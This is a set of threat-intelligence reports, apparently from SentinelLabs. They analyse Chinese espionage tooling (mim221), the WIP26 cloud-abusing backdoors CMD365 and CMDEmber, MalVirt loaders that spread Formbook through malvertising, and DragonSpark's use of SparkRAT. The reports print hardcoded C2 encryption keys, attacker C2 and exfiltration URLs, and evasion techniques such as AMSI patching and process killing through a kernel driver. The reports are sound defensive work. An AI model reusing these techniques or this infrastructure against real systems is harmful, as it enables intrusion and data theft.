The mim221 components that reflectively load other executables, pc.exe and pc.dll, patch beforehand a string in the loaded executable, which provides further timestampย  information: ====A!B@C#0-2022-05-23 16:33:03S. The patching involves replacing the string with configuration information, such as the mim221 execution password and a path to the log file for storing stolen credentials.

Patched timestamp string
Patched timestamp string

Attribution Analysis

We assess it is highly likely the initial attack phases we observed were conducted by Chinese threat actors with cyberespionage motivations. Telecommunication providers are frequent targets of espionage activity due to the sensitive data they hold. Our analysis identified indicators that point to the operation Soft Cell actors.

Operation Soft Cell has been associated with the Gallium group based on TTPs and some of the domains the group has been using.

Active since at least 2012, Gallium is likely a Chinese state-sponsored group that is targeting telecommunication, financial, and government entities in Southeast Asia, Europe, Africa, and the Middle East. While the groupโ€™s original focus has been on telecommunication providers, recent reports suggest that Gallium has recently expanded targeting across other sectors.

The initial intrusion vector and the majority of the TTPs we observed closely match those conducted by, or associated with, the Soft Cell actors. This includes deploying webshells at Microsoft Exchange servers for establishing an initial foothold, following same file naming conventions, using the LG tool and the net, query, and tasklist Windows built-in tools for gathering user and process information, and the PsExec Windows Sysinternals tool and net for lateral movement and exploration, respectively.

It is worth noting that the attackersโ€™ activities at one of the targets suggested previous knowledge of the environment. We had observed activity at the same target a few months prior, which we attributed to Gallium primarily based on the use of the groupโ€™s PingPull backdoor and TTPs.

By pivoting on the original filename of mim221โ€™s getHashFlsa64.dll, we observed another sample that steals credentials from LSASS. This sample has the PDB path of e:\vs_proj\mimkTools\getHashFlsa\getHashFlsa\x64\release\getHashFlsa64.pdb and has been first submitted to VirusTotal from Vietnam on January 04, 2023.

The path partially overlaps with the PDB path of a Mimikatz Soft Cell executable (E:\vs_proj\simplify_modify\Win32\simplify.pdb) and another Mimikatz executable of a Chinese threat actor thought to be part of the Soft Cell activity group arsenal (E:\vs_proj\mimkTools\dcsync_new\x64\dcsync64.pdb). This indicates that mim221 and these binaries may originate from the same source.

Closer analysis confirms that the sample we pivoted to is a previous, less-advanced version of mim221 โ€“ Version 2.2.0 โ€“ that does not include some mim221 components, such as AddSecurityPackage64.dll and pc.dll. We refer to this sample as mim220.


Output from mim220 (top) and mim221 (bottom)
Output from mim220 (top) and mim221 (bottom)

Previous research indicates possible connections between the Soft Cell actors and APT41, which is known to conduct Chinese state-sponsored espionage activity as well as financially motivated activity targeting multiple sectors with a broad geographical coverage, including telecommunication providers.

The connection between the Soft Cell actors and APT41 that most relates to the activities that we observed is based on the Whizzimo, LLC certificate of the Soft Cell binary with a PDB path E:\vs_proj\simplify_modify\Win32\simplify.pdb, a binary that possibly originates from the same source as mim221. This certificate has been reported to be used by APT41. Pivoting on this certificate reveals further Mimikatz modifications, some with filenames very similar to those we observed.

Conclusions

Chinese cyberespionage threat actors are known to have a strategic interest in the Middle East. This is evident from their consistent targeted attacks on various entities including government, finance, entertainment, and telecommunication organizations. The recent activities targeting the telecommunication sector this post discusses are some of the latest such attacks.

Our analysis of mim221 highlights the continuous maintenance and further development of the Chinese espionage malware arsenal. These threat actors will almost certainly continue exploring and upgrading their tools with new techniques for evading detection, including integrating and modifying publicly available code.

SentinelLabs continues to monitor espionage activities and hopes that defenders will leverage the findings presented in this post to bolster their defenses.

Indicators of Compromise

SHA1 Note
f54a41145b732d47d4a2b0a1c6e811ddcba48558 pc.exe
1c405ba0dd99d9333173a8b44a98c6d029db8178 AddSecurityPackage64.dll (unpatched)
df4bd177b40dd66f3efb8d6ea39459648ffd5c0e AddSecurityPackage64.dll (patched)
814f980877649bc67107d9e27e36fba677cad4e3 pc.dll
508408edda49359247edc7008762079c5ba725d9 getHashFlsa64.dll (unpatched)
97a7f1a36294e5525310f121e1b98e364a22e64d getHashFlsa64.dll (patched)

WIP26 Espionage | Threat Actors Abuse Cloud Infrastructure in Targeted Telco Attacks

16 February 2023 at 10:55

By Aleksandar Milenkoski, Collin Farr, and Joey Chen, in collaboration with QGroup

Executive Summary

  • A new threat cluster we track as WIP26 has been targeting telecommunication providers in the Middle East.
  • We assess it is likely that WIP26 is espionage-related.
  • WIP26 relies heavily on public Cloud infrastructure in an attempt to evade detection by making malicious traffic look legitimate.
  • WIP26 involves the use of backdoors, dubbed CMD365 and CMDEmber, which abuse Microsoft 365 Mail and Google Firebase services for C2 purposes.
  • WIP26 also involves the use of Microsoft Azure and Dropbox instances as data exfiltration and malware hosting sites.

Overview

In collaboration with QGroup GmbH, SentinelLabs is monitoring a threat activity we track as WIP26. The threat actor behind WIP26 has been targeting telecommunication providers in the Middle East. WIP26 is characterized by the abuse of public Cloud infrastructure โ€“ Microsoft 365 Mail, Microsoft Azure, Google Firebase, and Dropbox โ€“ for malware delivery, data exfiltration, and C2 purposes.

The WIP26 activity is initiated by precision targeting of employees through WhatsApp messages that contain Dropbox links to a malware loader. Tricking employees into downloading and executing the loader ultimately leads to the deployment of backdoors that leverage Microsoft 365 Mail and Google Firebase instances as C2 servers. We refer to these backdoors as CMD365 and CMDEmber, respectively. The main functionality of CMD365 and CMDEmber is to execute attacker-provided system commands using the Windows command interpreter.

The use of public Cloud infrastructure for C2 purposes is an attempt to make malicious C2 network traffic look legitimate and therefore make detection harder for defenders. The CMD365 and CMDEmber samples we observed masquerade as utility software, such as a PDF editor or browser, and as software that conducts update operations. The masquerading attempt involves the use of filenames, application icons, and digital signatures that indicate existing software vendors.

This report provides details on the WIP26 threat activity and further context around the use of CMD365 and CMDEmber.

Intrusion Vector and Activities

The initial intrusion vector succeeded through sending targeted WhatsApp messages to employees. The messages contained Dropbox links to archive files that supposedly contain only documents on poverty issues in the Middle East. The archives stored such documents, but also a malware loader (PDFelement.exe) masquerading as the PDFelement application.

The PDFelement.exe malware loader has an invalid digital signature that indicates the vendor of the PDFelement application โ€“ Wondershare.

The digital signature of PDFelement.exe
The digital signature of PDFelement.exe

The loader deploys the CMD365 backdoor, a .NET executable named Update.exe, and creates a scheduled task named MicrosoftUpdatesA that executes CMD365 at system startup for persistence.

The MicrosoftUpdatesA scheduled task
The MicrosoftUpdatesA scheduled task

The main functionality of CMD365 is to execute commands from a C2 hosted on a Microsoft 365 Mail instance. This capability was used to conduct a variety of activities, such as reconnaissance, privilege escalation, staging of additional malware, and data exfiltration.

Among the malware deployed on compromised machines, we observed another CMD365 sample in addition to the Update.exe โ€“ EdgeUpdater.exe. Further, we observed CMDEmber samples, which use Google Firebase Realtime Database instances as C2 servers โ€“ .NET executables named Update.exe and Launcher.exe.

The exfiltrated data included usersโ€™ private browser data and reconnaissance information on particular high-value hosts in the victimโ€™s network. This is a typical precursor to the subsequent targeting of these hosts. The data exfiltration was orchestrated through the execution of PowerShell commands to transport key data to Microsoft Azure instances. The threat actor behind WIP26 used the Windows Azure website socialmsdnmicrosoft.azurewebsites[.]net as a malware hosting site and akam.azurewebsites[.]net as a data exfiltration site.

In addition to exfiltration, the threat actor utilized the open source tool Chisel masquerading as the Media Player Classic application with an invalid certificate signed as โ€œRare Ideas LLCโ€. This was used to create a TCP tunnel over HTTP from the IP address 193.29.56[.]122, an IP that has previously been associated with Cobalt Strike activity. This was the first and only direct access attempt that was not from Microsoft 365 Mail or Google Firebase instances.

The figure below gives an overview of the Cloud infrastructure the threat actor behind WIP26 used for initial infection and as C2 servers, and exfiltration and malware hosting sites. We informed Google, Microsoft, and Dropbox about the abuse of their infrastructure.

WIP26: Use of Cloud infrastructure
WIP26: Use of Cloud infrastructure

CMD365: Abuse Of Microsoft 365 Mail

CMD365 interacts using the Microsoft Graph API with a Microsoft 365 Mail inbox that has the role of a C2 server.ย  An open-source implementation of Graph API usage for C2 communication is the Azure Outlook C2 tool.

The CMD365 sample Update.exe is a .NET application that masquerades as the legitimate Postman application, signed with an invalid signature.

The digital signature of Update.exe
The digital signature of Update.exe

The core feature of CMD365 is to execute attacker-provided system commands as standard input to an instance of the Windows command interpreter.

CMD365 executes a command
CMD365 executes a command

CMD365 issues an HTTP POST request to login.microsoftonline[.]com to authenticate itself to a Microsoft 365 Mail inbox using valid credentials that are hardcoded in the malware. The malware then receives an OAuth Bearer access token that it uses in the further interaction with Microsoft 365.

CMD365 authenticates at Microsoft 365 Mail
CMD365 authenticates at Microsoft 365 Mail

CMD365 then creates an inbox folder with a name that is unique for each infected machine. The name is a combination of the physical address of the main active network interface on the machine, the machineโ€™s computer name, and the name of the user in whose context the malware executes. CMD365 collects this information when it starts executing.

CMD365 builds a machine-specific inbox folder name
CMD365 builds a machine-specific inbox folder name
CMD365 creates an inbox folder
CMD365 creates an inbox folder

CMD365 polls the inbox folder for C2 commands by querying for emails whose subjects start with the keyword Input. These emails contain C2 input intended for processing by CMD365 on infected machines.

CMD365 polls for C2 commands
CMD365 polls for C2 commands

The C2 server and CMD365 exchange encrypted and Base64-encoded data. For data encryption and decryption, the malware uses the AES key Xc4u7x!A%D*G-KaPdSr56tp2s5v8y/B? (in string format) and an empty initialization vector (IV).

CMD365 encrypts data
CMD365 encrypts data

CMDEmber: Abuse Of Google Firebase

CMDEmber interacts with a Google Firebase Realtime Database instance that has the role of a C2 server. The CMDEmber sample Launcher.exe is a .NET application that masquerades as the Opera browser and has an invalid signature that indicates the Opera Norway software vendor. CMDEmber uses the open-source Firebase library by Step Up Labs for communicating with the Google Firebase instances.

The digital signature of Launcher.exe
The digital signature of Launcher.exe

As with CMD365, the core feature of CMDEmber is to execute system commands using the Windows command interpreter.

When executed, CMDEmber connects to the Firebase instance https://gmall-52fb5-default-rtdb.asia-southeast1.firebasedatabase[.]app/ or https://go0gle-service-default-rtdb.firebaseio[.]com, and then exfiltrates information about the infected machine. The exfiltrated data includes some of the information that the CMDEmber collects โ€“ the computer name, the bitness, name, and ID of the CMDEmber process, the name of the user in whose context CMDEmber executes, and the IPv4 and physical addresses of all operational network interfaces on the infected machine.

CMDEmber uses the MD5 hash of the Triple DES key Mgirdhgi256HIKnuefsdf!dfgsdfkjsrht (in string format) to encrypt and decrypt the Base64 data exchanged with the C2.

CMDEmber sends and receives data from the C2 server by issuing HTTP POST and GET requests, respectively. The URL paths of these requests contain a unique identifier of each infected machine, which is a combination of the ID and bitness of the CMDEmber process, and the physical addresses of the operational network interfaces at the victim machine.

CMDEmber exfiltrates machine information
CMDEmber exfiltrates machine information

After exfiltrating information about the infected machine, CMDEmber polls the Firebase instance for C2 commands by issuing HTTP GET requests that include the identifier of the infected machine.

CMDEmber polls for C2 commands
CMDEmber polls for C2 commands

The data that the C2 server and CMDEmber exchange is in JSON format. The Firebase C2 server stores exchanged data with all infected machines in a JSON-formatted file such that the nodes are the unique identifiers of the machines:

  • The who field indicates the communication direction. The value server marks data sent from the C2 server to an infected machine, whereas the value client marks data sent in the opposite direction.
  • The field data stores the actual data: attacker-provided commands, command outputs, or the information that CMDEmber exfiltrates from infected machines.
Exfiltrated machine information (obfuscated form)
Exfiltrated machine information (obfuscated form)
Command sent to an infected machine (deobfuscated form)
Command sent to an infected machine (deobfuscated form)
Command output from the infected machine (deobfuscated form)
Command output from the infected machine (deobfuscated form)

Attribution Analysis

We assess it is likely this activity is espionage-related. We track this activity as WIP26 โ€“ the Work-In-Progress (WIPxx) designation is used for unattributed activity clusters.

The initial intrusion vector we observed involved precision targeting: The threat actor sent WhatsApp messages to targets with download links to backdoor malware. Further, the targeting of telecommunication providers in the Middle East suggests the motive behind this activity is espionage-related. Communication providers are frequent targets of espionage activity due to the sensitive data they hold. Finally, evidence suggests that once they established a foothold, the threat actor targeted usersโ€™ private information and specific networked hosts of high value.

The threat actor behind WIP26 activity appears to have made some OPSEC errors. For example, the JSON file where the Google Firebase C2 server stores data exchanged with machines infected by CMDEmber is publicly accessible at the time of writing, providing further insights into the WIP26 activity.

The use of public Cloud infrastructure by APT groups is not unheard of. These threat actors continue to innovate in order to stay stealthy. This includes leveraging public Cloud infrastructure for C2 purposes to blend in and make the detection of C2 traffic harder for defenders.

For example, the North Korean APT 37 (InkySquid) has used the Microsoft Graph API for C2 operations. Further, similar to CMD365, the SIESTAGRAPH backdoor, used in the REF2924 intrusion set targeting the Foreign Affairs Office of an ASEAN member,ย  leverages the Microsoft Graph API to access Microsoft 365 Mail for C2 communication. Also, the DoNot threat group, which is known for targeting Kashmiri non-profit organizations and Pakistani government officials, has abused Google Firebase Cloud Messaging to stage malware. Finally, threat activity tied to APT28 (Fancy Bear) has leveraged Microsoft OneDrive services for C2 purposes.

Conclusions

The WIP26 activity is a relevant example of threat actors continuously innovating their TTPs in an attempt to stay stealthy and circumvent defenses. The use of public Cloud infrastructure for malware hosting, data exfiltration, and C2 purposes aims at making malicious traffic look legitimate. This gives attackers the opportunity to conduct their activities unnoticed. We hope that this report helps to emphasize this tactic in the continuous effort to identify threat groups engaged in targeting critical industries.

SentinelLabs continues to track the WIP26 threat cluster to provide further insight into its evolution, future activity, and attribution.

Indicators of Compromise

Type Value Note
SHA-1 B8313A185528F7D4F62853A44B64C29621627AE7 The PDFelement.exe malware loader
SHA-1 8B95902B2C444BCDCCB8A481159612777F82BAD1 CMD365 sample (Update.exe)
SHA-1 3E10A3A2BE17DCF8E79E658F7443F6C3C51F8803 CMD365 sample (EdgeUpdater.exe)
SHA-1 A7BD58C86CF6E7436CECE692DA8F78CEB7BA56A0 CMDEmber sample (Launcher.exe)
SHA-1 6B5F7659CE48FF48F6F276DC532CD458BF15164C CMDEmber sample (Update.exe)
Domain https://gmall-52fb5-default-rtdb.asia-southeast1.firebasedatabase[.]app/ Google Firebase instance used for C2 purposes
Domain https://go0gle-service-default-rtdb.firebaseio[.]com/ Google Firebase instance used for C2 purposes
URL https://graph.microsoft[.]com/beta/users/3517e816-6719-4b16-9b40-63cc779da77c/mailFolders Microsoft 365 Mail location used for C2 purposes
URL https://www.dropbox[.]com/s/6a8u8wlpvv73fe4/ Dropbox malware hosting site
URL https://www.dropbox[.]com/s/hbc5yz8z116zbi9/ Dropbox malware hosting site
URL https://socialmsdnmicrosoft.azurewebsites[.]net/AAA/ Microsoft Azure malware hosting site
URL https://socialmsdnmicrosoft.azurewebsites[.]net/ABB/ Microsoft Azure malware hosting site
URL https://socialmsdnmicrosoft.azurewebsites[.]net/ABB/ Microsoft Azure malware hosting site
URL https://socialmsdnmicrosoft.azurewebsites[.]net/AMA/ Microsoft Azure malware hosting site
URL https://socialmsdnmicrosoft.azurewebsites[.]net/AS/ Microsoft Azure malware hosting site
URL https://akam.azurewebsites[.]net/api/File/Upload Microsoft Azure data exfiltration site
IP address 193.29.56[.]122 Chisel C2 server

MalVirt | .NET Virtualization Thrives in Malvertising Attacks

2 February 2023 at 10:55

By Aleksandar Milenkoski and Tom Hegel

Executive Summary

  • SentinelLabs observed a cluster of virtualized .NET malware loaders distributed through malvertising attacks.
  • The loaders, dubbed MalVirt, use obfuscated virtualization for anti-analysis and evasion along with the Windows Process Explorer driver for terminating processes.
  • MalVirt loaders are currently distributing malware of the Formbook family as part of an ongoing campaign.
  • To disguise real C2 traffic and evade network detections, the malware beacons to random decoy C2 servers hosted at different hosting providers, including Azure, Tucows, Choopa, and Namecheap.

Overview

While investigating recent malvertising (malicious advertising) attacks, SentinelLabs spotted a cluster of virtualized malware loaders that has joined the trend. The loaders are implemented in .NET and use virtualization, based on the KoiVM virtualizing protector of .NET applications, in order to obfuscate their implementation and execution. We refer to these loaders as MalVirt (a recently observed and likely related implementation is referred to as KoiVM Loader). Although popular for hacking tools and cracks, the use of KoiVM virtualization is not often seen as an obfuscation method utilized by cybercrime threat actors.

Among the payloads that MalVirt loaders distribute, we spotted infostealer malware of the Formbook family as part of an ongoing campaign at the time of writing. The distribution of this malware through the MalVirt loaders is characterized by an unusual amount of applied anti-analysis and anti-detection techniques.

The current spikes in threat actors using alternative malware distribution methods to Office macros, such as malvertising, Windows Shortcuts (LNK files), and ISO files, comes as a response to Microsoft blocking by default Office macros in documents from the Internet. Malvertising is a malware delivery method that is currently very popular among threat actors, marked by a significant increase in malicious search engine advertisements in recent weeks.

The Formbook family โ€“ Formbook and its newer version XLoader โ€“ย  is a feature-rich infostealer malware that implements a wide range of functionalities, such as keylogging, screenshot theft, theft of web and other credentials, and staging of additional malware. For example, one of the hallmarks of XLoader is its intricate disguising of C2 traffic.

This malware is sold on the dark web and is traditionally delivered as an attachment to phishing emails. While it is typically used by threat actors with cybercrime motivations, its use has also been recently observed as part of attacks with potentially political motivations โ€“ in September 2022,ย  Ukraineโ€™s CERT reported a Formbook/XLoader campaign targeting Ukrainian state organizations through war-themed phishing emails. In the case of an intricate loader, this could suggest an attempt to co-opt cybercriminal distribution methods to load more targeted second-stage malware onto specific victims after initial validation.

We focus on the MalVirt loaders and the infostealer malware subsequently distributed by them in order to highlight the effort the threat actors have invested in evading detection and thwarting analysis.

The MalVirt Loaders

We first spotted a MalVirt sample when performing a routine Google search for โ€œBlender 3Dโ€ and examining the Ad results.

Malicious advertisements (โ€œBlender 3Dโ€ Google search)
Malicious advertisements (โ€œBlender 3Dโ€ Google search)

The MalVirt samples we analyzed have the PDB pathย 

C:\Users\Administrator\source\repos\DVS-Calculator-Windows-App-main\Calculator\obj\x86\Debug\Calculator.pdb

They can be further characterized by obfuscated namespace, class, and function names composed of alphanumeric characters, such as Birthd1y or Tota2, in the same manner as previously observed Formbook loaders.

MalVirt namespace, class, and function names
MalVirt namespace, class, and function names

The loaders pretend to be digitally signed using signatures and countersignatures from companies such as Microsoft, Acer, DigiCert, Sectigo, and AVG Technologies USA. However, in each case the signatures are invalid, created using invalid certificates or are certificates untrusted by the system (i.e., not stored in the Trusted Root Certification Authorities certificate store). For example, the following certificate appears to be from Microsoft but doesnโ€™t pass signature validation.

  • Name: Microsoft Corporation
  • Thumbprint: 8c2136e83f9526d3c44c0bb0bccc6cf242702b16
  • Serial Number: 00b6bce5a3c0e0111b78adf33d9fdc3793
A digital signature of a MalVirt sample
A digital signature of a MalVirt sample

The MalVirt loaders we analyzed, especially those distributing malware of the Formbook family, implement a range of anti-analysis and anti-detection techniques, with some variations across MalVirt samples. For example, some samples patch the AmsiScanBuffer function implemented in amsi.dll to bypass the Anti Malware Scan Interface (AMSI) that detects malicious PowerShell commands.

Further, in an attempt to evade static detection mechanisms, some strings (such as amsi.dll and AmsiScanBuffer) are Base-64 encoded and AES-encrypted. The MalVirt loaders decode and decrypt such strings using hardcoded, Base64-encoded AES encryption keys.

String decryption
String decryption

We also observed MalVirt samples evaluating whether they are executing within a virtual machine or an application sandbox environment. For example, detecting the VirtualBox and VMWare environments involves querying the registry keys HKEY_LOCAL_MACHINE\SOFTWARE\Oracle\VirtualBox Guest and HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware Tools, and evaluating the presence of the drivers vboxmouse.sys, vmmouse.sys, and vmhgfs.sys on victim systems.

Detecting the Wine and Sandboxie application sandbox environments involves evaluating the presence of the wine_get_unix_file_name function in the kernel32.dll Windows library and the SbieDll.dll Sandboxie library on victim systems.

Detection of virtual machine and application sandbox environments
Detection of virtual machine and application sandbox environments

Process Explorer Driver

We observed MalVirt samples deploying and loading the Process Explorer driver, part of the Windows Sysinternals toolset. This includes a sample (SHA-1: 15DB79699DCEF4EB5D731108AAD6F97B2DC0EC9C) that distributes malware of the Formbook family as part of an active campaign at the time of writing. An assembly named 0onfirm, which this sample reflectively loads, deploys the Process Explorer driver in the %LOCALAPPDATA%\Temp directory under the name ะ˜ะธััƒั.sys. The driver has a valid digital signature issued by Microsoft using an expired certificate (validity period between 15 December 2020 and 12 December 2021).

0onfirm then deploys the driver by creating a service named TaskKill. The assembly creates the ImagePath, Start, Type, and ErrorControl registry values at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TaskKill to deploy the driver and configure its loading at system start-up. The name TaskKill indicates the potential malicious use of ะ˜ะธััƒั.sys โ€“ process termination with kernel privileges.

0onfirm deploys and loads ะ˜ะธััƒั.sys
0onfirm deploys and loads ะ˜ะธััƒั.sys
ะ˜ะธััƒั.sys loaded at system start-up a DriverView output
ะ˜ะธััƒั.sys loaded at system start-up (a DriverView output)

Malware in general uses the Process Explorer driver to conduct activities with kernel privileges, such as killing processes of detection mechanisms to evade detection or duplicating process handles for tampering. For example, in late 2022, the use of the ะ˜ะธััƒั.sys driver was observed as part of the deployment (potentially also through a MalVirt loader) of a different payload โ€“ Agent Tesla. The open-source tool Backstab also demonstrates the malicious use of the Process Explorer driver.

Obfuscated .NET Virtualization

A hallmark of the MalVirt loaders is the use of .NET virtualization as an anti-analysis and -detection technique. When executed, a MalVirt sample reflectively loads an assembly, such as 0onfirm,ย  which further orchestrates the staging of the final payload. These assemblies are virtualized using the KoiVM virtualizing protector of .NET applications, modified with additional obfuscation techniques. Code virtualization on its own is among the most advanced methods for obfuscating executables at this time.

A KoiVM-virtualized MalVirt assembly
A KoiVM-virtualized MalVirt assembly

Virtualization frameworks such as KoiVM obfuscate executables by replacing the original code, such as NET Common Intermediate Language (CIL) instructions, with virtualized code that only the virtualization framework understands. A virtual machine engine executes the virtualized code by translating it into the original code at runtime. When put to malicious use, virtualization makes malware analysis challenging and also represents an attempt to evade static analysis mechanisms.

Tools for the automated de-virtualization of virtualized executables using KoiVM, such as OldRod, can be very effective when facing the standard implementation of KoiVM. OldRod recompiles virtualized code into .NET CIL code in an attempt to recover the original code.

The current standard implementation of KoiVM defines 119 constant variables that the framework uses to virtualize code constructs. These constructs include, for example, flag and instruction opcode definitions. The variables are grouped and ordered according to the constructs they virtualize.

When initialized, KoiVM assigns values to these variables in a designated routine. This is a crucial component of the KoiVM virtualization process. Automated de-virtualization involves detecting this routine by searching for assignment instructions, and using the assigned values to recompile the virtualized code to its native form. However, MalVirt makes automated de-virtualization challenging by using a modified version of the standard KoiVM implementation with obfuscation techniques.

KoiVM constant variables
KoiVM constant variables

The designated KoiVM routine is obfuscated such that it conducts arithmetic operations instead of concise assignments. This is to confuse devirtualization frameworks, such as OldRod, attempting to detect the routine and extract the variable values crucial for accurate de-virtualization.

Obfuscated value assignments
Obfuscated value assignments

To defeat this obfuscation technique, the values that the modified implementation of KoiVM assigns to the constant variables can be extracted from the memory of the virtualized MalVirt assembly while it executes. The routine can then be patched such that it assigns the appropriate value to each constant variable using concise assignments. This helps a de-virtualization framework to detect the routine and extract the values.

Values of constant variables in the memory of a virtualized MalVirt assembly
Values of constant variables in the memory of a virtualized MalVirt assembly
Patched value assignment routine
Patched value assignment routine

However, the modified implementation of KoiVM used by MalVirt adds yet another layer of obfuscation โ€“ it distorts the original order of the constant variables defined by the standard KoiVM implementation. This confuses de-virtualization frameworks and may lead to incorrect de-virtualization.

Restoring the original order can be a very challenging and time-consuming task. This involves the manual inference of the constructs that each of the 119 variables is used for based on code analysis. Alternatively, one could develop logic to automate this activity, which may prove to be an equally challenging endeavor.

Infostealer Campaign

The infostealer malware samples that the MalVirt loaders distribute are part of an on-going campaign at the time of writing. A campaign is marked by an identifier that is present in HTTP POST and GET requests issued by the malware.

The gwmr campaign identifier
The gwmr campaign identifier

Formbook and XLoader have traditionally been distributed via phishing emails and malspam via Macro-enabled Office documents. Our observation of malware of the Formbook family being distributed through MalVirt loaders suggests that it is likely that Formbook and/or XLoader are being (or will be) distributed via malvertising as well. This follows the trend of crimeware actors in their quick shift into Google malvertising.

In addition to the MalVirt loaders, Formbook and XLoader themselves implement considerable protection against analysis and detection, both at executable- and network-level.

Formbook and XLoader disguise real C2 traffic among smokescreen HTTP requests with encoded and encrypted content to multiple domains, randomly selected from an embedded list. Only one of the domains is the real C2 server and the rest are decoys. A sample we analyzed issued HTTP GET and/or POST requests with encoded and encrypted HTTP data to 17 domains (16 endpoints) listed in the IOC table below. Previous research provides detailed information on how XLoader in particular implements this technique.

The technique of camouflaging the true C2 domain through beaconing to multiple domains remains consistent with the previously noted research. The malware beacons to domains containing legitimate and/or unused registered domains. As shown in the following image, as a snapshot of some domains the malware contacts, there is a wide variety of domain times, hosting providers, and age between their relevant registration date.

Example variety of domains
Example variety of domains

The domains are hosted by a range of providers including Choopa, Namecheap, and multiple others. The random approach to domain selection is beyond the scope of this report; however, it remains a highly effective way of concealing true C2s. XLoaderโ€™s recent infrastructure concealing techniques in particular should serve as an example of how crimeware can be even more technically sophisticated than many of todayโ€™s APTs.

At an executable-level, among other anti-analysis techniques, the malware detects the presence of user- and kernel-land debuggers using the NtQueryInformationProcess and NtQuerySystemInformation functions by specifying the ProcessDebugPort (0x7) and SystemKernelDebuggerInformation (0x23) information classes. Previous research provides a detailed overview of the implemented anti-analysis and -detection techniques.

Debugger detection
Debugger detection

Conclusions

As a response to Microsoft blocking Office macros by default in documents from the Internet, threat actors have turned to alternative malware distribution methods โ€“ most recently, malvertising. The MalVirt loaders we observed demonstrate just how much effort threat actors are investing in evading detection and thwarting analysis.

Malware of the Formbook family is a highly capable infostealer that is deployed through the application of a significant amount of anti-analysis and anti-detection techniques by the MalVirt loaders. Traditionally distributed as an attachment to phishing emails, we assess that threat actors distributing this malware are likely joining the malvertising trend.

Given the massive size of the audience threat actors can reach through malvertising, we expect malware to continue being distributed using this method.

Indicators Of Compromise

Type Value Note
SHA1 15DB79699DCEF4EB5D731108AAD6F97B2DC0EC9C MalVirt loader sample
SHA1 655D0B6F6570B5E07834AA2DD8211845B4B59200 0onfirm .NET assembly
SHA1 BC47E15537FA7C32DFEFD23168D7E1741F8477ED Process Explorer driver
SHA1 51582417D24EA3FEEBF441B8047E61CBE1BA2BF4 Infostealer malware payload
Domain www.togsfortoads[.]com Contacted domain as part of C2 disguise traffic
Domain www.popimart[.]xyz Contacted domain as part of C2 disguise traffic
Domain www.kajainterior[.]com Contacted domain as part of C2 disguise traffic
Domain www.heji88.hj-88[.]com Contacted domain as part of C2 disguise traffic
Domain www.headzees[.]com Contacted domain as part of C2 disguise traffic
Domain www.in-snoqualmievalley[.]com Contacted domain as part of C2 disguise traffic
Domain www.365heji[.]com Contacted domain as part of C2 disguise traffic
Domain www.h3lpr3[.]store Contacted domain as part of C2 disguise traffic
Domain www.graciesvoice[.]info Contacted domain as part of C2 disguise traffic
Domain www.femfirst.co[.]uk Contacted domain as part of C2 disguise traffic
Domain www.cistonewhobeliev[.]xyz Contacted domain as part of C2 disguise traffic
Domain www.allspaceinfo[.]com Contacted domain as part of C2 disguise traffic
Domain www.baldur-power[.]com Contacted domain as part of C2 disguise traffic
Domain www.ohotechnologies[.]com Contacted domain as part of C2 disguise traffic
Domain www.carlosaranguiz[.]dev Contacted domain as part of C2 disguise traffic
Domain www.iidethakur[.]xyz Contacted domain as part of C2 disguise traffic
Domain www.huifeng-tech[.]com Contacted domain as part of C2 disguise traffic

DragonSpark | Attacks Evade Detection with SparkRAT and Golang Source Code Interpretation

24 January 2023 at 10:55

By Aleksandar Milenkoski, Joey Chen, and Amitai Ben Shushan Ehrlich

Executive Summary

  • SentinelLabs tracks a cluster of recent opportunistic attacks against organizations in East Asia as DragonSpark.
  • SentinelLabs assesses it is highly likely that a Chinese-speaking actor is behind the DragonSpark attacks.
  • The attacks provide evidence that Chinese-speaking threat actors are adopting the little known open source tool SparkRAT.
  • The threat actors use Golang malware that implements an uncommon technique for hindering static analysis and evading detection: Golang source code interpretation.
  • The DragonSpark attacks leverage compromised infrastructure located in China and Taiwan to stage SparkRAT along with other tools and malware.

Overview

SentinelLabs has been monitoring recent attacks against East Asian organizations we track as โ€˜DragonSparkโ€™. The attacks are characterized by the use of the little known open source SparkRAT and malware that attempts to evade detection through Golang source code interpretation.

The DragonSpark attacks represent the first concrete malicious activity where we observe the consistent use of the open source SparkRAT, a relatively new occurrence on the threat landscape. SparkRAT is multi-platform, feature-rich, and frequently updated with new features, making the RAT attractive to threat actors.

The Microsoft Security Threat Intelligence team reported in late December 2022 on indications of threat actors using SparkRAT. However, we have not observed concrete evidence linking DragonSpark to the activity documented in the report by Microsoft.

We observed that the threat actor behind the DragonSpark attacks uses Golang malware that interprets embedded Golang source code at runtime as a technique for hindering static analysis and evading detection by static analysis mechanisms. This uncommon technique provides threat actors with yet another means to evade detection mechanisms by obfuscating malware implementations.

Intrusion Vector

We observed compromises of web servers and MySQL database servers exposed to the Internet as initial indicators of the DragonSpark attacks. Exposing MySQL servers to the Internet is an infrastructure posture flaw that often leads to severe incidents that involve data breaches, credential theft, or lateral movement across networks. At compromised web servers, we observed use of the China Chopper webshell, recognizable by the &echo [S]&cd&echo [E] sequence in virtual terminal requests. China Chopper is commonly used by Chinese threat actors, which are known to deploy the webshell through different vectors, such as exploiting web server vulnerabilities, cross-site scripting, or SQL injections.

After gaining access to environments, the threat actor conducted a variety of malicious activities, such as lateral movement, privilege escalation, and deployment of malware and tools hosted at attacker-controlled infrastructure. We observed that the threat actor relies heavily on open source tools that are developed by Chinese-speaking developers or Chinese vendors. This includes SparkRAT as well as other tools, such as:

  • SharpToken: a privilege escalation tool that enables the execution of Windows commands with SYSTEM privileges. The tool also features enumerating user and process information, and adding, deleting, or changing the passwords of system users.
  • BadPotato: a tool similar to SharpToken that elevates user privileges to SYSTEM for command execution. The tool has been observed in an attack campaign conducted by a Chinese threat actor with the goal of acquiring intelligence.
  • GotoHTTP: a cross-platform remote access tool that implements a wide array of features, such as establishing persistence, file transfer, and screen view.

In addition to the tools above, the threat actor used two custom-built malware for executing malicious code: ShellCode_Loader, implemented in Python and delivered as a PyInstaller package, and m6699.exe, implemented in Golang.

SparkRAT

SparkRAT is a RAT developed in Golang and released as open source software by the Chinese-speaking developer XZB-1248. SparkRAT is a feature-rich and multi-platform tool that supports the Windows, Linux, and macOS operating systems.

SparkRAT uses the WebSocket protocol to communicate with the C2 server and features an upgrade system. This enables the RAT to automatically upgrade itself to the latest version available on the C2 server upon startup by issuing an upgrade request. This is an HTTP POST request, with the commit query parameter storing the current version of the tool.

A SparkRAT upgrade request
A SparkRAT upgrade request

